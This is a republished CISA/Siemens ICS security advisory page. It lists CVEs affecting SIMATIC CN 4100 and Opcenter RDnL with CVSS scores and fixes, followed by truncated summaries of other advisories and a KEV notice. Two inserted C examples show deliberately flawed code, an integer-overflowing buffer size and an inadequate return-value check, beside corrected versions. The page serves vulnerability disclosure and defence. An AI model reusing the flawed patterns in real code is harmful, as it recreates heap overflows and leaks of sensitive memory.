Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 4.8; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE-2026-21932

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: AWT, JavaFX). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition.
Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.

Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator).

CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N).

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7.4; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

CVE-2026-21933

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition.
Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.

Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security.

CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 6.1; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE-2026-21945

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16.
Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition.

Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator).

CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-400 Uncontrolled Resource Consumption
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-21947

Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data.
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator).

CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Metrics: CVSS Version 3.1; Base Score 3.1; Base Severity LOW; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE-2026-22924

The affected application does not properly restrict unauthenticated connections and is susceptible to resource exhaustion conditions. This could allow an attacker to disrupt normal operations or perform unauthorized actions, potentially impacting system availability and integrity.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS Version 3.1; Base Score 9.1; Base Severity CRITICAL; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CVE-2026-22925

The affected application is susceptible to resource exhaustion when subjected to a high volume of TCP SYN packets. This could allow an attacker to render the service unavailable and cause denial-of-service conditions by overwhelming system resources.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-28387

Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side.

Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code.

However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0)/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage.

By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records.

No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

CVE-2026-28388

Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing.

Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application.

When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference.

Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it.

The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy.

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-28389

Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen.

Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service.

When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing.

Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable.

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-28390

Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen.
Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service.

When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing.

Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable.

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-31789

Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms.

Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior.

If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow.
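The size calculation described for CVE-2026-31789, as an added example that is not OpenSSL's code: uint32_t stands in for a 32-bit size_t, and the function names and the "AA:BB" output layout (two hex digits plus one separator or terminator per byte) are assumptions chosen to match the factor of 3.

```c
#include <stdint.h>
#include <stdlib.h>

/* uint32_t models size_t on a 32-bit platform (assumption for this demo). */
typedef uint32_t size32_t;

/* Unchecked size: len * 3 wraps modulo 2^32 once len > UINT32_MAX / 3,
 * so a huge input yields a tiny allocation size. */
size32_t hex_size_unchecked(size32_t len)
{
    return len * 3u;
}

/* Checked size: refuses empty input and any length whose product with 3
 * does not fit. Returns 0 and stores the size on success, -1 otherwise. */
int hex_size_checked(size32_t len, size32_t *out)
{
    if (len == 0 || len > UINT32_MAX / 3u)
        return -1;
    *out = len * 3u;
    return 0;
}

/* Hypothetical converter: renders buf as "AA:BB:CC". Each input byte uses
 * exactly 3 output bytes (2 digits + ':' or the final NUL), which is where
 * the factor of 3 comes from. Returns NULL on a rejected length or on
 * allocation failure; the caller frees the result. */
char *buf_to_hex(const unsigned char *buf, size32_t len)
{
    static const char digits[] = "0123456789ABCDEF";
    size32_t need, i;
    char *out, *p;

    if (buf == NULL || hex_size_checked(len, &need) != 0)
        return NULL;
    out = malloc(need);
    if (out == NULL)
        return NULL;
    p = out;
    for (i = 0; i < len; i++) {
        *p++ = digits[buf[i] >> 4];
        *p++ = digits[buf[i] & 0x0f];
        *p++ = (i + 1 == len) ? '\0' : ':';
    }
    return out;
}
```

With the unchecked calculation, a length just above UINT32_MAX / 3 produces a size of 2 bytes while the conversion loop would still write three bytes per input byte.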
Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity.

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

CVE-2026-31790

Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer.

Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker.

RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced.

If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext.
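The return-value check described for CVE-2026-31790, shown as an added example rather than OpenSSL's code: toy_public_encrypt() is a hypothetical stand-in that follows the stated convention (bytes written on success, -1 on error), and the two wrappers contrast a non-zero test with a check for a positive, expected length.

```c
#include <stddef.h>
#include <string.h>

#define SECRET_LEN 16

/* Hypothetical stand-in for the encryption primitive: returns the number of
 * bytes written on success and -1 on error, leaving out untouched on error. */
int toy_public_encrypt(int key_is_valid, const unsigned char *in,
                       size_t inlen, unsigned char *out)
{
    size_t i;
    if (!key_is_valid)
        return -1;
    for (i = 0; i < inlen; i++)
        out[i] = in[i] ^ 0x5a;          /* placeholder transform, not crypto */
    return (int)inlen;
}

/* Flawed pattern: only a zero return is treated as failure, so -1 passes
 * and the caller is told that ct holds SECRET_LEN valid bytes. */
int encapsulate_flawed(int key_is_valid, unsigned char *ct, size_t *ctlen)
{
    unsigned char secret[SECRET_LEN];
    int ret;
    memset(secret, 0x11, sizeof(secret));
    ret = toy_public_encrypt(key_is_valid, secret, sizeof(secret), ct);
    if (ret == 0)
        return 0;
    *ctlen = SECRET_LEN;
    return 1;
}

/* Checked pattern: success requires a positive return equal to the expected
 * length; on failure the output is cleared and its length set to zero. */
int encapsulate_checked(int key_is_valid, unsigned char *ct, size_t *ctlen)
{
    unsigned char secret[SECRET_LEN];
    int ret;
    memset(secret, 0x11, sizeof(secret));
    ret = toy_public_encrypt(key_is_valid, secret, sizeof(secret), ct);
    if (ret <= 0 || (size_t)ret != SECRET_LEN) {
        memset(ct, 0, SECRET_LEN);
        *ctlen = 0;
        return 0;
    }
    *ctlen = (size_t)ret;
    return 1;
}

/* Models a caller that reuses a buffer holding old data (0xAA marker,
 * constructed) and forwards ct when encapsulation reports success.
 * Returns 1 if the bytes that would be forwarded are the stale marker. */
int stale_bytes_exposed(int (*encap)(int, unsigned char *, size_t *),
                        int key_is_valid)
{
    unsigned char ct[SECRET_LEN];
    size_t ctlen = 0, i;
    memset(ct, 0xAA, sizeof(ct));
    if (!encap(key_is_valid, ct, &ctlen) || ctlen == 0)
        return 0;                        /* nothing is forwarded */
    for (i = 0; i < ctlen; i++)
        if (ct[i] != 0xAA)
            return 0;                    /* real output was written */
    return 1;
}
```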
As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.

Affected Products
Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected

Remediations
Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/

Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions

Metrics
CVSS Version: 3.1
Base Score: 7.5
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Acknowledgments
Siemens ProductCERT reported these vulnerabilities to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.
Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-032379 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory.
Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12

Date        Revision  Summary
2026-05-12  1         Publication Date
2026-05-14  2         Initial CISA Republication of Siemens ProductCERT SSA-032379 advisory
Summary: Ruggedcom Rox contains an input validation vulnerability in the Scheduler functionality that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/
Summary: Ruggedcom Rox before v2.17.1 contain multiple third-party vulnerabilities. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/
Summary: Simcenter Femap is affected by heap based buffer overflow vulnerability in Datakit library that could be triggered when the application reads files in IPT format. If a user is tricked to open a malicious file with the affected application, an attacker could leverage the vulnerability to perform remote code execution in the context of the current process. Siemens has released a new version for Simcenter Femap and recommends to update to the latest version. The following versions of Siemens Simcenter Femap are affected: Simcenter Femap vers:intdot/
Summary: Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and execute code. The following versions of Universal Robots Polyscope 5 are affected: Polyscope 5
Summary: Ruggedcom Rox contains an input validation vulnerability in the feature key installation process that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/
Summary: Siemens Teamcenter is affected by multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Teamcenter are affected: Teamcenter V2312 vers:intdot/
Summary: Solid Edge SE2026 before Update 5 is affected by two file parsing vulnerabilities that could be triggered when the application reads specially crafted files in PAR format. This could allow an attacker to crash the application or execute arbitrary code. Siemens has released a new version for Solid Edge SE2026 and recommends to update to the latest version. The following versions of Siemens Solid Edge are affected: Solid Edge vers:intdot/
Summary: The web server in SENTRON 7KT PAC1261 Data Manager before V2.1.0 contains a request smuggling vulnerability in the Go Project's net/http package that could allow an attacker to retrieve authorization tokens that can be used to gain administrative control over the device. Siemens has released a new version for SENTRON 7KT PAC1261 Data Manager and recommends to update to the latest version. The following versions of Siemens SENTRON 7KT PAC1261 Data Manager are affected: SENTRON 7KT PAC1261 Data Manager vers:intdot/
Summary: Opcenter RDnL is affected by missing authentication in critical function in ‘ActiveMQ Artemis’. An unauthenticated attacker within the adjacent network could use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in availability impacts or message injection into any queue via the rogue broker. Breaking the integrity of a message has a low impact due to missing auto refresh functionality and it does not contain any confidential information. ActiveMQ Artemis has released a new version and Siemens recommends to update to the latest version.

The following versions of Siemens Opcenter RDnL are affected:
Opcenter RDnL vers:all/*

CVSS: v3 7.1
Vendor: Siemens
Equipment: Siemens Opcenter RDnL
Vulnerabilities: Missing Authentication for Critical Function

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-27446
Missing Authentication for Critical Function (CWE-306) vulnerability in Apache Artemis, Apache ActiveMQ Artemis. An unauthenticated remote attacker can use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in message injection into any queue and/or message exfiltration from any queue via the rogue broker. This impacts environments that allow both:
- incoming Core protocol connections from untrusted sources to the broker
- outgoing Core protocol connections from the broker to untrusted targets

Affected Products
Siemens Opcenter RDnL
Vendor: Siemens
Product Version: Opcenter RDnL
Product Status: known_affected

Remediations
Mitigation: Implement and deploy a Core interceptor to deny all Core downstream federation connect packets.
Such packets have a type of (int) -16 or (byte) 0xfffffff0. Documentation for interceptors is available at https://artemis.apache.org/components/artemis/documentation/latest/intercepting-operations.html .
Mitigation: Remove Core protocol support from any acceptor receiving connections from untrusted sources. Incoming Core protocol connections are supported by default via the "artemis" acceptor listening on port 61616. See the "protocols" URL parameter configured for the acceptor. An acceptor URL without this parameter supports all protocols by default, including Core.
Mitigation: Use two-way SSL (i.e. certificate-based authentication) in order to force every client to present the proper SSL certificate when establishing a connection before any message protocol handshake is attempted. This will prevent unauthenticated exploitation of this vulnerability.
Vendor fix: Update to Apache Artemis version 2.52.0 or later version

Relevant CWE: CWE-306 Missing Authentication for Critical Function

Metrics
CVSS Version: 3.1
Base Score: 7.1
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.
Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-085541 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12

Date        Revision  Summary
2026-05-12  1         Publication Date
2026-05-14  2         Initial CISA Republication of Siemens ProductCERT SSA-085541 advisory
Summary: Ruggedcom Rox contains an improper access control vulnerability that could allow an authenticated remote attacker to read arbitrary files with root privileges from the underlying operating system's filesystem. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/
Summary: SIMATIC S7 PLCs contain multiple vulnerabilities in the web server that could allow an attacker to perform cross-site scripting attacks. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available. The following versions of Siemens SIMATIC S7 PLC Web Server are affected: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0) vers:intdot/
CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

CVE-2026-20182 Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise.

Note: Please adhere to CISA’s guidelines to assess exposure and mitigate risks associated with Cisco SD-WAN devices as outlined in Emergency Directive 26-03: Mitigate Vulnerabilities in Cisco SD-WAN Systems and Supplemental Direction ED 26-03: Hunt and Hardening Guidance for Cisco SD-WAN Systems. Adhere to the applicable Binding Operational Directive (BOD) 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available.

